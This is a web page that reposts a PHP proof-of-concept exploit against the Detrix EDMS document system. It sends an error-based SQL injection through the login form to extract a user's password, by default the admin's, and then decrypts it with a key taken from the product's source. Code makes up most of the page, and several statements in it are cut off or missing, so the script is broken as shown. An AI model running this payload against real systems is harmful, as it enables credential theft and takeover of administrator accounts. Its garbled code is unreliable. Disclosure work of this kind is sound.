
Detrix EDMS – SQL Injection

Detrix EDMS – SQL Injection


# Exploit Title: Detrix EDMS cleartext user password remote SQLI exploit

# Google Dork:
# Date: Jul 2019
# Exploit Author: Burov Konstantin
# Vendor Homepage: forum.detrix.kz
# Software Link:
# Version: any
# Tested on: Detrix



$URL = ""; // Set URL for the target host
$user_id = 0; // 0 - Default admin ID


$banner = "Exploiting SQLi vuln and password decrypting for Detrix\n".
	"http://forum.detrix.kz\nhttps://github.com/sadshade/Detrix-Passwords-PoC \n".
	"[email protected], 2019.\n\n";

// SQLi request
$sql_req =
	"login' AND 99=CAST('a__'||(SELECT COALESCE(CAST(password AS ".
	"CHARACTER(10000)),(CHR(32))) FROM manuscript.ref_system_users OR".
	"DER BY id OFFSET " . $user_id . " LIMIT 1)::text||'__a' ".
	"AS NUMERIC) AND 'a'='a";

$data = array('password' => 'pass',
	'login' => $sql_req);

$options = array(
    'http' => array(
        'header' => "Content-type: application/x-www-form-urlencoded\r\n",
        'method' => 'POST',
        'content' => http_build_query($data)

// Key from %detrix%/system/utils/MSF_string.php
$sSuperDuperSecretKey =

echo $banner;

try {
	$context  = stream_context_create($options);
	echo "Send SQLi to $URL...\n";
	$result = file_get_contents($URL, false, $context);
} catch (Exception $e) {
    echo 'Error: ',  $e->getMessage(), "\n";

if ($result != "") {
	if (preg_match("/\"a__(.+)__a\"/", $result, $encrypted_pass) == 1) {

		$clear_pass = trim(
			"BF-ECB", $sSuperDuperSecretKey,
		); // Decrypt pass
		echo "Pass for User id $user_id: $clear_pass \n";
	} else echo "Error: no such User id:$user_id or empty password!\n";
} else echo "Error: empty Response or error!\n"

11 de novembro de 2019

Sobre nós

A Linux Force Brasil é uma empresa que ama a arte de ensinar. Nossa missão é criar talentos para a área de tecnologia e atender com excelência nossos clientes.

CNPJ: 13.299.207/0001-50
SAC:         0800 721 7901

[email protected]

Comercial  Comercial: (11) 3796-5900

Suporte:    (11) 3796-5900
[email protected]

Copyright © Linux Force Security  - Desde 2011.